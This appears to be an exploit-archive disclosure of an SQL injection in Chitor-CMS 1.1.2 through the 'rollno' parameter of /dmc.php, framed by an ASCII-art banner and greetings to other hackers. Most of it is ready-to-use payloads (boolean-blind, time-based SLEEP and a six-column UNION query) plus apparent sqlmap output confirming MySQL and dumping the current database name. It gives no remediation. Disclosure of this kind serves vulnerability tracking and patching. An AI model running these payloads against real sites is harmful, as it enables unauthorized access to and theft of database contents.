┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://github.com/waqaskanju/Chitor-CMS                                   │
│  Vendor   : Waqas Ahmad                                                                │
│  Software : Chitor-CMS 1.1.2                                                           │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /dmc.php

https://website/dmc.php?rollno=[SQLI]&submit=

GET parameter 'rollno' is vulnerable to SQLI


[+] Starting the Attack

---
Parameter: rollno (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: rollno=(SELECT (CASE WHEN (8157=8157) THEN 123 ELSE (SELECT 6602 UNION SELECT 8316) END))&submit=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: rollno=123 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))WFHu)&submit=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: rollno=123 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627871,0x795671465a5a414e7252507a55426e644b53514b45556c7a554f73727674517276705877617a5541,0x71627a7171),NULL,NULL,NULL-- -&submit=1
---

[INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[INFO] fetching current database
current database: '***0611***_chitor_db'


[-] Done